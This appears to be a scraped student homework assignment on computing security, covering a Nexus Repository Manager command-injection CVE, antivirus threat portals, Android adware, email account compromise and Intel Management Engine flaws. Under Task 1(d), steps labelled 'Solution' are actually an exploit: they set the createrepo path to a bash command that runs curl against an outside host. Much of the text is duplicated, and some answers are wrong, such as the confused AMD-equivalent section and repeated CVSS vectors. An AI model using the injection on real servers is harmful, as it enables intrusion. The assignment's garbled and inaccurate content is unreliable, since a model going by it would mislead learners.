Security in Computing and IT Assignment 1: Analysis and Solutions
VerifiedAdded on 2022/09/02
|19
|2346
|19
Homework Assignment
AI Summary
This assignment delves into the realm of security in computing and IT, encompassing a detailed analysis of vulnerabilities, mitigation strategies, and real-world examples. Task 1 focuses on a recent vulnerability from the National Vulnerability Database (NVD), providing a description, impact assessment using CVSS scores (both version 2 and 3), and proposed solutions. The assignment also explores strategies to mitigate cyber security incidents, referencing the ASD's guidelines. Task 2 investigates various antivirus companies' websites, evaluating their risk criteria and vulnerability reporting. Task 3 examines mobile threats, specifically adware, and their global impact. Task 4 addresses email security, outlining potential hacking methods and recommended countermeasures. Finally, Task 5 discusses the Intel Management Engine and its security implications, including mitigation strategies. The assignment demonstrates a comprehensive understanding of security concepts and practical application of knowledge.
Running head: Security in Computing and IT
Security in Computing and IT
Name of the Student
Name of the University
Author Note
Security in Computing and IT
Name of the Student
Name of the University
Author Note
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
Security in Computing and IT 1
Table of Contents
Task 1:........................................................................................................................................2
Task 2:........................................................................................................................................6
Task 3:......................................................................................................................................11
Task 4:......................................................................................................................................13
Three ways of email account can be hacked:.......................................................................14
The things to do at the time email gets hacked:...................................................................14
Change the passcode:.......................................................................................................14
Check the setting:.............................................................................................................14
Scan your computer:........................................................................................................14
Tools:....................................................................................................................................15
Avanan Cloud Security Platform:....................................................................................15
SpamTitan:.......................................................................................................................15
Task 5:......................................................................................................................................15
Intel Management Engine:...................................................................................................15
AMD equivalent:..................................................................................................................15
Security concern:..................................................................................................................16
Intel’s responsibility:............................................................................................................16
Response of computer vendors:...........................................................................................16
Article:..................................................................................................................................17
Bibliography:............................................................................................................................18
Table of Contents
Task 1:........................................................................................................................................2
Task 2:........................................................................................................................................6
Task 3:......................................................................................................................................11
Task 4:......................................................................................................................................13
Three ways of email account can be hacked:.......................................................................14
The things to do at the time email gets hacked:...................................................................14
Change the passcode:.......................................................................................................14
Check the setting:.............................................................................................................14
Scan your computer:........................................................................................................14
Tools:....................................................................................................................................15
Avanan Cloud Security Platform:....................................................................................15
SpamTitan:.......................................................................................................................15
Task 5:......................................................................................................................................15
Intel Management Engine:...................................................................................................15
AMD equivalent:..................................................................................................................15
Security concern:..................................................................................................................16
Intel’s responsibility:............................................................................................................16
Response of computer vendors:...........................................................................................16
Article:..................................................................................................................................17
Bibliography:............................................................................................................................18
2Security in Computing and IT
Task 1:
a)
Link: https://nvd.nist.gov/vuln/detail/CVE-2019-15588#vulnCurrentDescriptionTitle
There is an OS command Injection that is existed in the Nexus Repository Manager 2.14.14
(bypass CVE-2019-5475) which might allow a hacker RCE (Remote Code Execution). All of
the instances including the CommandLineExecutor.java with the capability of Yum
Configuration.
b)
CVSS Score version 2: 9.0 HIGH
Task 1:
a)
Link: https://nvd.nist.gov/vuln/detail/CVE-2019-15588#vulnCurrentDescriptionTitle
There is an OS command Injection that is existed in the Nexus Repository Manager 2.14.14
(bypass CVE-2019-5475) which might allow a hacker RCE (Remote Code Execution). All of
the instances including the CommandLineExecutor.java with the capability of Yum
Configuration.
b)
CVSS Score version 2: 9.0 HIGH
3Security in Computing and IT
Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Complexity: Low
Impact sub-score: 10.0
Confidentiality: Complete
CVSS Score version 3:
Score: 7.2 HIGH
Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Complexity: Low
Impact sub-score: 10.0
Confidentiality: Complete
CVSS Score version 3:
Score: 7.2 HIGH
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
4Security in Computing and IT
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Complexity: Low
Impact score: 5.9
Confidentiality: High
c)
Mitigation strategies:
Application whitelisting: This strategy is useful for preventing execution of the
malicious and unapproved programs that includes .exe, DLL, scripts.
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Complexity: Low
Impact score: 5.9
Confidentiality: High
c)
Mitigation strategies:
Application whitelisting: This strategy is useful for preventing execution of the
malicious and unapproved programs that includes .exe, DLL, scripts.
5Security in Computing and IT
Patch applications: The applications need to be patched, the users have to use the
applications in their latest version.
Purpose of using CVSS scores:
The CVSS attempts for assigning severity scores to the vulnerabilities that provide
allowance to the responders for prioritizing the resources and responses in accord with the
threats. The scores can be calculated on the basis of a formula that is having dependency on
various matrices. The CVSS scores are used to determine temporal, severity as well as
environmental scores that are exist too. The present version of CVSS is CVSSv3.1 which was
released in June, 2019.
d)
Solution:
1. Navigate to the capabilities in the Nexus repository manager.
2. Create or edit a new Yum: capability of configuration.
3. Set path of "createrepo" or "mergerepo" to an OS command (/bin / bash -c curl $
{IFS} http:// 192.168.88.1:8000 // createrepo).
Patch applications: The applications need to be patched, the users have to use the
applications in their latest version.
Purpose of using CVSS scores:
The CVSS attempts for assigning severity scores to the vulnerabilities that provide
allowance to the responders for prioritizing the resources and responses in accord with the
threats. The scores can be calculated on the basis of a formula that is having dependency on
various matrices. The CVSS scores are used to determine temporal, severity as well as
environmental scores that are exist too. The present version of CVSS is CVSSv3.1 which was
released in June, 2019.
d)
Solution:
1. Navigate to the capabilities in the Nexus repository manager.
2. Create or edit a new Yum: capability of configuration.
3. Set path of "createrepo" or "mergerepo" to an OS command (/bin / bash -c curl $
{IFS} http:// 192.168.88.1:8000 // createrepo).
6Security in Computing and IT
e)
Task 2:
a)
McAfee: https://www.mcafee.com/enterprise/en-us/threat-center.html#
Kaspersky: https://threats.kaspersky.com/
AVG: https://www.avg.com/en-in/about-viruses
Bit defender: https://threatmap.bitdefender.com/
b)
Anti-virus Risk criteria Date Recommendatio Description
e)
Task 2:
a)
McAfee: https://www.mcafee.com/enterprise/en-us/threat-center.html#
Kaspersky: https://threats.kaspersky.com/
AVG: https://www.avg.com/en-in/about-viruses
Bit defender: https://threatmap.bitdefender.com/
b)
Anti-virus Risk criteria Date Recommendatio Description
Paraphrase This Document
Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
7Security in Computing and IT
n
McAfee The website
has described
the risk criteria
very well as
one can easily.
There is a
threat centre
included in the
site.
The dates are
mentioned in
the site such as
when the
threats were
determined.
The website
should provide
mitigation
techniques for
current
vulnerabilities.
The developers
needed to manage
the options such a
way that someone
can access all the
information
easily.
The users can
learn about top
quality cyber
security threats
in the threat
landscape
dashboard.
Kaspersky The risks are
described very
well in the site.
There is a
threat centre
included in the
site
The dates are
mentioned in
the site such as
when the
threats were
determined.
The developers
need to add bullet
points that all the
information can
be found easily.
The Kaspersky
is an antivirus
software that
provide security
to the sites,
personal PCs.
AVG One can easily
find the
mitigation plan
for a threat.
The dates are
mentioned in
the site such as
when the
The developers
needed to manage
the options such a
way that someone
Devices, data,
offices can be
remain safe by
the antivirus.
n
McAfee The website
has described
the risk criteria
very well as
one can easily.
There is a
threat centre
included in the
site.
The dates are
mentioned in
the site such as
when the
threats were
determined.
The website
should provide
mitigation
techniques for
current
vulnerabilities.
The developers
needed to manage
the options such a
way that someone
can access all the
information
easily.
The users can
learn about top
quality cyber
security threats
in the threat
landscape
dashboard.
Kaspersky The risks are
described very
well in the site.
There is a
threat centre
included in the
site
The dates are
mentioned in
the site such as
when the
threats were
determined.
The developers
need to add bullet
points that all the
information can
be found easily.
The Kaspersky
is an antivirus
software that
provide security
to the sites,
personal PCs.
AVG One can easily
find the
mitigation plan
for a threat.
The dates are
mentioned in
the site such as
when the
The developers
needed to manage
the options such a
way that someone
Devices, data,
offices can be
remain safe by
the antivirus.
8Security in Computing and IT
threats were
determined.
can access all the
information
easily
Bit defender There is a
threat centre
included in the
site. The risks
are described
very well in the
site.
The dates are
mentioned in
the site such as
when the
threats were
determined.
The interface of
the website need
to improve as all
the information
are hazy.
The antivirus
provide internet
security to the
sites
threats were
determined.
can access all the
information
easily
Bit defender There is a
threat centre
included in the
site. The risks
are described
very well in the
site.
The dates are
mentioned in
the site such as
when the
threats were
determined.
The interface of
the website need
to improve as all
the information
are hazy.
The antivirus
provide internet
security to the
sites
9Security in Computing and IT
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
10Security in Computing and IT
c)
The vulnerabilities and threats are listed in the websites. However, the threats cannot
be found easily from the websites as the things are very hazy to find from the sites. For
comparing the threats, one has to compare the threats manually, the user need to take one
vulnerability from the sites respectively and the user has to compare them manually.
d)
The threats are listed in all of the sites but the ways are different for each sites. As to
compare the threats, one has to compare the threats manually, the user need to take one
vulnerability from the sites respectively and the user has to compare them manually.
For analysing the threats Kaspersky is the best as all the threats are listed well in the
site. Screenshot attached below.
c)
The vulnerabilities and threats are listed in the websites. However, the threats cannot
be found easily from the websites as the things are very hazy to find from the sites. For
comparing the threats, one has to compare the threats manually, the user need to take one
vulnerability from the sites respectively and the user has to compare them manually.
d)
The threats are listed in all of the sites but the ways are different for each sites. As to
compare the threats, one has to compare the threats manually, the user need to take one
vulnerability from the sites respectively and the user has to compare them manually.
For analysing the threats Kaspersky is the best as all the threats are listed well in the
site. Screenshot attached below.
11Security in Computing and IT
Task 3:
a)
Threat 1: https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Dilidi/
These applications try to obtain super user rights on a device and periodically connect to a
server in order to download and stealthily install other applications. In addition, they monitor
all applications installed on the device and send information about them to a server.
Task 3:
a)
Threat 1: https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Dilidi/
These applications try to obtain super user rights on a device and periodically connect to a
server in order to download and stealthily install other applications. In addition, they monitor
all applications installed on the device and send information about them to a server.
12Security in Computing and IT
Threat 2: https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Ewind/
Adware of this family shows advertising banners on the infected device and inserts ads in
browsers. Some modifications of AdWare.AndroidOS.Ewind insert ads in social networking
apps.
b)
The threats have been spread from the vulnerable advertises. The hackers have monitored the
devices that are installed in the devices.
c)
Serial Country % of users attacked worldwide*
1 Russian Federation 25.57
2 India 14.58
3 Algeria 4.10
Threat 2: https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Ewind/
Adware of this family shows advertising banners on the infected device and inserts ads in
browsers. Some modifications of AdWare.AndroidOS.Ewind insert ads in social networking
apps.
b)
The threats have been spread from the vulnerable advertises. The hackers have monitored the
devices that are installed in the devices.
c)
Serial Country % of users attacked worldwide*
1 Russian Federation 25.57
2 India 14.58
3 Algeria 4.10
Paraphrase This Document
Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
13Security in Computing and IT
4 Indonesia 4.08
5 Bangladesh 3.85
6 Ukraine 3.07
7 Philippines 1.91
8 Nigeria 1.73
9 Nepal 1.70
10 Vietnam 1.59
d)
The hackers have monitored the devices that are installed in the devices. The hackers have
spread the threats through malicious ads that have occurred at the victims’ computer, when
the victim accessed the ad the system got attacked from the hackers.
e)
The user have to install antivirus in the system
The user have to keep the system up to date.
Task 4:
a)
4 Indonesia 4.08
5 Bangladesh 3.85
6 Ukraine 3.07
7 Philippines 1.91
8 Nigeria 1.73
9 Nepal 1.70
10 Vietnam 1.59
d)
The hackers have monitored the devices that are installed in the devices. The hackers have
spread the threats through malicious ads that have occurred at the victims’ computer, when
the victim accessed the ad the system got attacked from the hackers.
e)
The user have to install antivirus in the system
The user have to keep the system up to date.
Task 4:
a)
14Security in Computing and IT
Three ways of email account can be hacked:
The user may fell for phishing scam which has asked the user for confirming the
passcode. Those type of scam emails can be convincing.
The user did not log out from the account after logging in the account from a public
device or PC.
The user might use an easy, weak or a passcode that can be guessed easily, or similar
passcodes have been used in multiple sites.
b)
The things to do at the time email gets hacked:
Change the passcode:
The attackers would not change the account passwords always. The meaning of this
is, the user can still retrieve the account by getting the OTP via forgot password. By changing
the password, and by giving a secure password the user will be able to prevent the email from
future or further attacks.
Check the setting:
After changing the password the user has to check the account setting as well as the
user has to check the setting inside the account, as well as they have to check if anything on
the account has been changed. The attackers can also forward emails from the account to
their account. The users have to check for that too.
Scan your computer:
The users have to run malware scan regularly, at the time the account will be got
hacked, the user has to check the remnants or the malwares which might be activated in the
computer that belongs to the user. The user have to make sure about the passcode, that the
password is unique and long for all of the sites.
Three ways of email account can be hacked:
The user may fell for phishing scam which has asked the user for confirming the
passcode. Those type of scam emails can be convincing.
The user did not log out from the account after logging in the account from a public
device or PC.
The user might use an easy, weak or a passcode that can be guessed easily, or similar
passcodes have been used in multiple sites.
b)
The things to do at the time email gets hacked:
Change the passcode:
The attackers would not change the account passwords always. The meaning of this
is, the user can still retrieve the account by getting the OTP via forgot password. By changing
the password, and by giving a secure password the user will be able to prevent the email from
future or further attacks.
Check the setting:
After changing the password the user has to check the account setting as well as the
user has to check the setting inside the account, as well as they have to check if anything on
the account has been changed. The attackers can also forward emails from the account to
their account. The users have to check for that too.
Scan your computer:
The users have to run malware scan regularly, at the time the account will be got
hacked, the user has to check the remnants or the malwares which might be activated in the
computer that belongs to the user. The user have to make sure about the passcode, that the
password is unique and long for all of the sites.
15Security in Computing and IT
c)
Tools:
There are several tools that are available in the market for providing more security to the
Email account. Some of them are listed below:
Avanan Cloud Security Platform:
The Avanan Cloud Security Platform is available at 3 levels such as complete cloud
security, complete malware security and anti phishing. The tool is seeking out of the
innovative technologies related to security from the top vendors of the Industry.
SpamTitan:
This tool is from the Titan HQ which is the lead in filtering anti spam which can
control, protect and clean against the unwanted mails at the time of blocking viruses, spam
and malware.
Task 5:
a)
Intel Management Engine:
The Intel Management Engine has been included within the Intel chipset from the
year 2008. This is basically a small computer that remains inside another computer which is
having full access to the computer memory, input devices, network and display. The codes
that it runs, are written and developed by Intel which has not shared the detailed information
about the inner working of it.
AMD equivalent:
The can be known by the current data that the Sceptre or Meltdown is having minimal
impact on the gaming. The AMD is having APUs. This is one of the marketing jargon for the
c)
Tools:
There are several tools that are available in the market for providing more security to the
Email account. Some of them are listed below:
Avanan Cloud Security Platform:
The Avanan Cloud Security Platform is available at 3 levels such as complete cloud
security, complete malware security and anti phishing. The tool is seeking out of the
innovative technologies related to security from the top vendors of the Industry.
SpamTitan:
This tool is from the Titan HQ which is the lead in filtering anti spam which can
control, protect and clean against the unwanted mails at the time of blocking viruses, spam
and malware.
Task 5:
a)
Intel Management Engine:
The Intel Management Engine has been included within the Intel chipset from the
year 2008. This is basically a small computer that remains inside another computer which is
having full access to the computer memory, input devices, network and display. The codes
that it runs, are written and developed by Intel which has not shared the detailed information
about the inner working of it.
AMD equivalent:
The can be known by the current data that the Sceptre or Meltdown is having minimal
impact on the gaming. The AMD is having APUs. This is one of the marketing jargon for the
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
16Security in Computing and IT
Graphics processor and CPU that are built on to the similar chip. They APUs come in various
types such as A4, A6, A8, and A10 as well as of the recent chips like A12. They are like the
i3, i5 or i7 processors that are developed by Intel. The processors that are developed by AMD
are having decent amounts of power of processing as well as they are really impressive for
their graphical capabilities. It can be said that the A10 processor of AMD is equivalent to the
core i5 processor of Intel.
b)
Security concern:
The software Intel Management Engine, is also known as Intel ME that has popped up
the news for the holes in the security that are announced by the Intel on 20th November, 2017.
The users need to patch the system if the system is vulnerable. The presence and deep system
of the software on each of the modern systems that are having Intel processor, means that the
system is an easy target for the hackers.
Intel’s responsibility:
On the 1st day of May, 2017, it was confirmed by Intel that a remote elevation of
privilege bug (SA – 00075) was existed in their management technology. Each of the
platform of Intel that are provisioned with standard manageability of Intel, small management
technology and active management technology are having a security hole that is remotely
exploitable in the ME.
Response of computer vendors:
Normally this is not possible for the users that they cannot disable the ME. Some of
the methods that are undocumented, has been discovered. However, the methods are not
supported by Intel. The security architecture of ME was designed for the prevention of
disabling.
Graphics processor and CPU that are built on to the similar chip. They APUs come in various
types such as A4, A6, A8, and A10 as well as of the recent chips like A12. They are like the
i3, i5 or i7 processors that are developed by Intel. The processors that are developed by AMD
are having decent amounts of power of processing as well as they are really impressive for
their graphical capabilities. It can be said that the A10 processor of AMD is equivalent to the
core i5 processor of Intel.
b)
Security concern:
The software Intel Management Engine, is also known as Intel ME that has popped up
the news for the holes in the security that are announced by the Intel on 20th November, 2017.
The users need to patch the system if the system is vulnerable. The presence and deep system
of the software on each of the modern systems that are having Intel processor, means that the
system is an easy target for the hackers.
Intel’s responsibility:
On the 1st day of May, 2017, it was confirmed by Intel that a remote elevation of
privilege bug (SA – 00075) was existed in their management technology. Each of the
platform of Intel that are provisioned with standard manageability of Intel, small management
technology and active management technology are having a security hole that is remotely
exploitable in the ME.
Response of computer vendors:
Normally this is not possible for the users that they cannot disable the ME. Some of
the methods that are undocumented, has been discovered. However, the methods are not
supported by Intel. The security architecture of ME was designed for the prevention of
disabling.
17Security in Computing and IT
Article:
NEWMAN, L., 2017. Intel chip flaws leave millions of devices exposed.
The security experts are warned of the management engine of Intel over the years. A set of
the confirmed vulnerabilities that is new as well as which are having impact on servers, PCs,
as well as IoT related devices shows that they can be right.
c)
Mitigation strategies:
The users have to update the firmware of ME.
The users have to update the components of Intel Me host OS like Intel(R)
Management & Security Status software, Intel Management Engine Interface Driver,
LMS service.
The users have to review configuration of components of ME OS.
The users have to block the ports 16992-16995 on the endpoints and firewalls.
Article:
NEWMAN, L., 2017. Intel chip flaws leave millions of devices exposed.
The security experts are warned of the management engine of Intel over the years. A set of
the confirmed vulnerabilities that is new as well as which are having impact on servers, PCs,
as well as IoT related devices shows that they can be right.
c)
Mitigation strategies:
The users have to update the firmware of ME.
The users have to update the components of Intel Me host OS like Intel(R)
Management & Security Status software, Intel Management Engine Interface Driver,
LMS service.
The users have to review configuration of components of ME OS.
The users have to block the ports 16992-16995 on the endpoints and firewalls.
18Security in Computing and IT
Bibliography:
Agrawal, A. and Wahie, K., 2016, February. Analyzing and optimizing cloud-based antivirus
paradigm. In 2016 International Conference on Innovation and Challenges in Cyber Security
(ICICCS-INBUSH) (pp. 203-207). IEEE.
Bagyalakshmi, G., Rajkumar, G., Arunkumar, N., Easwaran, M., Narasimhan, K., Elamaran,
V., Solarte, M., Hernández, I. and Ramirez-Gonzalez, G., 2018. Network vulnerability
analysis on brain signal/image databases using Nmap and Wireshark tools. IEEE Access, 6,
pp.57144-57151.
Cheung, C.F., 2017. The Implementation of a Portable Vulnerability Assessment Scanner.
Kritikos, K., Magoutis, K., Papoutsakis, M. and Ioannidis, S., 2019. A survey on
vulnerability assessment tools and databases for cloud-based web applications. Array, 3,
p.100011.
Kumar, M. and Alka, A., 2017. Reverse Engineering and Vulnerability Analysis in Cyber
Security. International Journal of Advanced Research in Computer Science, 8(5).
Savaglia, J. and Wang, P., 2017. CYBERSECURITY VULNERABILITY ANALYSIS VIA
VIRTUALIZATION. Issues in Information Systems, 18(4).
Bibliography:
Agrawal, A. and Wahie, K., 2016, February. Analyzing and optimizing cloud-based antivirus
paradigm. In 2016 International Conference on Innovation and Challenges in Cyber Security
(ICICCS-INBUSH) (pp. 203-207). IEEE.
Bagyalakshmi, G., Rajkumar, G., Arunkumar, N., Easwaran, M., Narasimhan, K., Elamaran,
V., Solarte, M., Hernández, I. and Ramirez-Gonzalez, G., 2018. Network vulnerability
analysis on brain signal/image databases using Nmap and Wireshark tools. IEEE Access, 6,
pp.57144-57151.
Cheung, C.F., 2017. The Implementation of a Portable Vulnerability Assessment Scanner.
Kritikos, K., Magoutis, K., Papoutsakis, M. and Ioannidis, S., 2019. A survey on
vulnerability assessment tools and databases for cloud-based web applications. Array, 3,
p.100011.
Kumar, M. and Alka, A., 2017. Reverse Engineering and Vulnerability Analysis in Cyber
Security. International Journal of Advanced Research in Computer Science, 8(5).
Savaglia, J. and Wang, P., 2017. CYBERSECURITY VULNERABILITY ANALYSIS VIA
VIRTUALIZATION. Issues in Information Systems, 18(4).
1 out of 19
Your All-in-One AI-Powered Toolkit for Academic Success.
+13062052269
info@desklib.com
Available 24*7 on WhatsApp / Email
![[object Object]](/_next/static/media/star-bottom.7253800d.svg)
Unlock your academic potential
© 2024 | Zucol Services PVT LTD | All rights reserved.